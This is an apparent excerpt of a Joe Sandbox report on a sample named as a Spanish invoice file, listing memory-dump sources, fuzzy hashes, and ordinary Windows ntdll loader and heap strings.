                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 922efb19000ef9512ea4b8ff483d8609956046463cb229fb0555d45007da5169
                                • Instruction ID: 7ec9190a1adc61afb7c263e0ad426c820bf2595a04847ed52464172be015865c
                                • Opcode Fuzzy Hash: 922efb19000ef9512ea4b8ff483d8609956046463cb229fb0555d45007da5169
                                • Instruction Fuzzy Hash: 0390023120340142954572586908B8E425547E1312B99E416E1019514CC9148A656221
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: abf86b13ab728d2858c9c5d0b67a0a986fdebb5793c9ef431e2ae1104e022a63
                                • Instruction ID: 309aa2eed5f5b5cbd5f0a772e5b6faf7088b96cbb21f7013dcd7871dfdf5581e
                                • Opcode Fuzzy Hash: abf86b13ab728d2858c9c5d0b67a0a986fdebb5793c9ef431e2ae1104e022a63
                                • Instruction Fuzzy Hash: 8190023160680012914571585988686415557E0311B59D012E1428514C8A148B5A6361
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b17ab75ba0a77256e6b669665bec27789493b5d963cefd59db75a488fa1816fa
                                • Instruction ID: 712df8a0fa0267590bac47b276cc323ecca1d7e22d7a6a6fc50565276ebcc11e
                                • Opcode Fuzzy Hash: b17ab75ba0a77256e6b669665bec27789493b5d963cefd59db75a488fa1816fa
                                • Instruction Fuzzy Hash: 4A90026160250042414571585908546615557E1311399D116E1558520C86188A59A269
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a11aaaf57cbd0ef8ea400849880459c71ef58c4e7bfd36337f284c516701c894
                                • Instruction ID: bc6fdf6a27829c75a877ef2cf8ffc3eba09911b20ae5ef285220211e530400e2
                                • Opcode Fuzzy Hash: a11aaaf57cbd0ef8ea400849880459c71ef58c4e7bfd36337f284c516701c894
                                • Instruction Fuzzy Hash: 3C90022521240003010AB5581708647019647D5361359D022F2019510CD6218A656121
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d59452b1911049e56b7e96cf111ed01236f26e3151b07a86a3c4efc4f21a2346
                                • Instruction ID: 270fb02d17883df2a63daefb819c0682b690f06092d313e1c4be0081e8b4705c
                                • Opcode Fuzzy Hash: d59452b1911049e56b7e96cf111ed01236f26e3151b07a86a3c4efc4f21a2346
                                • Instruction Fuzzy Hash: 7C90022522240002014AB558170864B059557D6361399D016F241A550CC6218A696321
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b3366880ef9447c95d590120d07dc27662b2a34e22dea67cb572e66d098a0bdd
                                • Instruction ID: 007e34bce648ae49522b4f37301fb103c4fb96a934896f324c962fb11e05ff27
                                • Opcode Fuzzy Hash: b3366880ef9447c95d590120d07dc27662b2a34e22dea67cb572e66d098a0bdd
                                • Instruction Fuzzy Hash: C19002A1202540924505B2589508B4A465547E0211B59D017E2058520CC5258A55A135
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 206661a48d6fe79881fd07bd8abd8f6d21b2334616f1d34f74c4bbd5b500d380
                                • Instruction ID: 498ab4b4b86a0beb51ca53d5282dd9ef93fb7af344951c3b43e36741d7a3bd9d
                                • Opcode Fuzzy Hash: 206661a48d6fe79881fd07bd8abd8f6d21b2334616f1d34f74c4bbd5b500d380
                                • Instruction Fuzzy Hash: 0690023120240802D1857158550878A015547D1311F99D016E1029614DCA158B5D77A1
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd

                                Control-flow Graph

                                APIs
                                Strings
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: d80134792dfb5e4892c596ea509428e118a4dd3af04ec4b7b1e51d14c8469b38
                                • Instruction ID: c50a918128c767e13321e1902b7853f5b12a2db0fff97560fa129198418de2c2
                                • Opcode Fuzzy Hash: d80134792dfb5e4892c596ea509428e118a4dd3af04ec4b7b1e51d14c8469b38
                                • Instruction Fuzzy Hash: 6D510DBAA0031ABFDB14DB58C990A7EFBB8BB483417508169E495D76C1D634DF40CBE0

                                Control-flow Graph

                                APIs
                                Strings
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 1da469800208aa25a722d9b0f07815b5ce9cd63e887859928f166a96c1364f54
                                • Instruction ID: 1233cc029c4f9659bdfac8d8109b53bf4ba15679653e69201308d06de7ca628f
                                • Opcode Fuzzy Hash: 1da469800208aa25a722d9b0f07815b5ce9cd63e887859928f166a96c1364f54
                                • Instruction Fuzzy Hash: 07510775A00745AFEB64CF9DC9A0ABFBBF8EB44240B408859E4D9C7641EA74DF00CB60

                                Control-flow Graph

                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: HEAP:
                                • API String ID: 3446177414-2466845122
                                • Opcode ID: 8c017684f791adb509ae266acbccc134ac7c1a17b6aee84f95a873736d87dea4
                                • Instruction ID: da99b4e9906c892a1c20617c40ae66832d86acd404f951d90935fc0ca6079673
                                • Opcode Fuzzy Hash: 8c017684f791adb509ae266acbccc134ac7c1a17b6aee84f95a873736d87dea4
                                • Instruction Fuzzy Hash: 18A18C75A043128FDB09CE28C890A1ABBE5FF88364F15496DF945DB350EB70EE46CB91

                                Control-flow Graph

                                Strings
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32554725
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32554742
                                • Execute=1, xrefs: 32554713
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 32554787
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32554655
                                • ExecuteOptions, xrefs: 325546A0
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 325546FC
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: b5a8542397e1fdc84d471fd061d5b9d9c4dceaddf9422073b95b85180e8b21a3
                                • Instruction ID: f3cd50072f883d1e07f7b1a0bf0fa70fc144bf248fd799e80da5987c6082a94a
                                • Opcode Fuzzy Hash: b5a8542397e1fdc84d471fd061d5b9d9c4dceaddf9422073b95b85180e8b21a3
                                • Instruction Fuzzy Hash: 3F510575A00319BBFF109EA9DC95FAE77B8AF44345F9004A9E505AB1C0EB70AB45CF50
                                Strings
                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 325479D0, 325479F5
                                • SsHd, xrefs: 324FA3E4
                                • Actx , xrefs: 32547A0C, 32547A73
                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325479FA
                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325479D5
                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32547AE6
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                • API String ID: 0-1988757188
                                • Opcode ID: 5dc9ffbbacf3524a8f78c1edadc729ef2ef74ca58a6918fa822ee60a46db02fa
                                • Instruction ID: 4f47f1dc22d9bfe622660885045ab9ca558715f101fa73b1cc3ecf24ade3b3e7
                                • Opcode Fuzzy Hash: 5dc9ffbbacf3524a8f78c1edadc729ef2ef74ca58a6918fa822ee60a46db02fa
                                • Instruction Fuzzy Hash: E9E1C174604352AFE714CE25C884B5AB7E1AFC4B58F504A2EEC95CB390DF32DA85CB91
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                • API String ID: 3446177414-4227709934
                                • Opcode ID: d91876eeef8e8ff8c8445082963cc38fb000e208b8654bc77eefd9ea4c4e23a2
                                • Instruction ID: f651a2156da0423dbd7e831563c0df0f17b6582deb731a4441ee70c8feee0883
                                • Opcode Fuzzy Hash: d91876eeef8e8ff8c8445082963cc38fb000e208b8654bc77eefd9ea4c4e23a2
                                • Instruction Fuzzy Hash: 1B416CB9A01209ABDB01DF99C980ADEBBB5BF49314F20015AED05E7351DB719A51CBA0
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                • API String ID: 3446177414-3492000579
                                • Opcode ID: 881e2f060d5e99e3b46bc3993af7174ef00a5e437bd497e391f6d43fce130f18
                                • Instruction ID: 954255f8af51d74c908e99da339fbb3ccfa2389798b74d7203ca4ac1c62395d5
                                • Opcode Fuzzy Hash: 881e2f060d5e99e3b46bc3993af7174ef00a5e437bd497e391f6d43fce130f18
                                • Instruction Fuzzy Hash: 0A71CD36A01284DFDB05CFA8D4506ADFBF2FF8A314F848499E445EB252CBB59A81CF50
                                APIs
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 32539AC5, 32539B06
                                • LdrpLoadShimEngine, xrefs: 32539ABB, 32539AFC
                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32539AB4
                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32539AF6
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-3589223738
                                • Opcode ID: 8c48ac997cd39d5227fbe8778d6a9cc4b56629f90d16bed4d0cff23f7f40b4c9
                                • Instruction ID: 92b6091c5148de257bb46dc8a110bc3fc4a3df3acae395308b842a9fbb217cb6
                                • Opcode Fuzzy Hash: 8c48ac997cd39d5227fbe8778d6a9cc4b56629f90d16bed4d0cff23f7f40b4c9
                                • Instruction Fuzzy Hash: 0E51F575B413589FDB08EFA8C854B9D77B2AB84304F440559F541FB296CBB09E81CB90
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: @3]2$LdrpUnloadNode$Unmapping DLL "%wZ"$df]2@3]2@3]2$minkernel\ntdll\ldrsnap.c
                                • API String ID: 3446177414-2199215269
                                • Opcode ID: ccfe33f67f13942fdc4c412ccd2e3244d637cd9fa139af4e82864f77ce2e5e59
                                • Instruction ID: f2a30507c33089e00bbf203638738998d33f3a16430b8d06d9f7585ffd15d125
                                • Opcode Fuzzy Hash: ccfe33f67f13942fdc4c412ccd2e3244d637cd9fa139af4e82864f77ce2e5e59
                                • Instruction Fuzzy Hash: 98512675605302AFE714DF38CC84B19BB90BFC4B24F448A6DE89597288DB70AB45CF95
                                APIs
                                Strings
                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3258F263
                                • HEAP: , xrefs: 3258F15D
                                • ---------------------------------------, xrefs: 3258F279
                                • Entry Heap Size , xrefs: 3258F26D
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                • API String ID: 3446177414-1102453626
                                • Opcode ID: 3c9618128352ed0f4f2eb31feef9251e2cbf86acb719fb4a5b2da63644665b3c
                                • Instruction ID: 507a0cd4657c6032799aed3923a980e458c40a67aa6089b1062eb11ada342c20
                                • Opcode Fuzzy Hash: 3c9618128352ed0f4f2eb31feef9251e2cbf86acb719fb4a5b2da63644665b3c
                                • Instruction Fuzzy Hash: 1441AE39B41216DFC704CF18C880A59BBF5EF4935575584AAE809EB311DBB1EE42CB90
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                • API String ID: 3446177414-1222099010
                                • Opcode ID: 1578f5873bd7599fdc943bbd9e3ec46e0bc7963fb63f8897bf6bebd16b3ac65c
                                • Instruction ID: f200e637fe0b15a029315a7394ccc8750d9f24fd712a151154da10191ab07996
                                • Opcode Fuzzy Hash: 1578f5873bd7599fdc943bbd9e3ec46e0bc7963fb63f8897bf6bebd16b3ac65c
                                • Instruction Fuzzy Hash: 16312535106780DFF716CB28CD15F9ABBE4EF01750F008489E84697B52CFB8AA81CE21
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                • Instruction ID: fd22b2a2a553bce52438e2449cf2cea6e0cee7aee3633b853911d3002104ffdc
                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                • Instruction Fuzzy Hash: EB0214B5509341AFDB04CF18C590A6FBBE5EFC8704F80892DF9984B2A4DB71EA45CB42
                                APIs
                                Strings
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$@
                                • API String ID: 3446177414-1194432280
                                APIs
                                Strings
                                • LdrpFindDllActivationContext, xrefs: 32553636, 32553662
                                • Querying the active activation context failed with status 0x%08lx, xrefs: 3255365C
                                • minkernel\ntdll\ldrsnap.c, xrefs: 32553640, 3255366C
                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3255362F
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                • API String ID: 3446177414-3779518884
                                Strings
                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3254A992
                                • minkernel\ntdll\ldrinit.c, xrefs: 3254A9A2
                                • LdrpDynamicShimModule, xrefs: 3254A998
                                • TGK2, xrefs: 32502462
                                Similarity
                                • API ID:
                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGK2$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1393885241
                                APIs
                                Strings
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$[$]:%u
                                • API String ID: 48624451-2819853543
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 3446177414-3610490719
                                APIs
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 3254A121
                                • LdrpCheckModule, xrefs: 3254A117
                                • Failed to allocated memory for shimmed module list, xrefs: 3254A10F
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-161242083
                                APIs
                                • RtlDebugPrintTimes.NTDLL ref: 325B8B03
                                • RtlDebugPrintTimes.NTDLL ref: 325B8B5B
                                  • Part of subcall function 32522B60: LdrInitializeThunk.NTDLL ref: 32522B6A
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes$InitializeThunk
                                • String ID: $File
                                • API String ID: 1259822791-2412145507
                                APIs
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 325582E8
                                • LdrpInitializePerUserWindowsDirectory, xrefs: 325582DE
                                • Failed to reallocate the system dirs string !, xrefs: 325582D7
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-1783798831
                                Strings
                                • RTL: Re-Waiting, xrefs: 32557BAC
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32557B7F
                                • RTL: Resource at %p, xrefs: 32557B8E
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3255728C
                                Strings
                                • RTL: Re-Waiting, xrefs: 325572C1
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32557294
                                • RTL: Resource at %p, xrefs: 325572A3
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                APIs
                                Strings
                                • minkernel\ntdll\ldrredirect.c, xrefs: 32564899
                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32564888
                                • LdrpCheckRedirection, xrefs: 3256488F
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                • API String ID: 3446177414-3154609507
                                APIs
                                Strings
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$]:%u
                                • API String ID: 48624451-3050659472
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Wow64 Emulation Layer
                                • API String ID: 3446177414-921169906
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                • String ID:
                                • API String ID: 4281723722-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-
                                • API String ID: 1302938615-2137968064
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0$Flst
                                • API String ID: 0-758220159
                                APIs
                                Strings
                                • kLsE, xrefs: 324E0540
                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 324E063D
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                • API String ID: 3446177414-2547482624
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: 0$0
                                • API String ID: 3446177414-203156872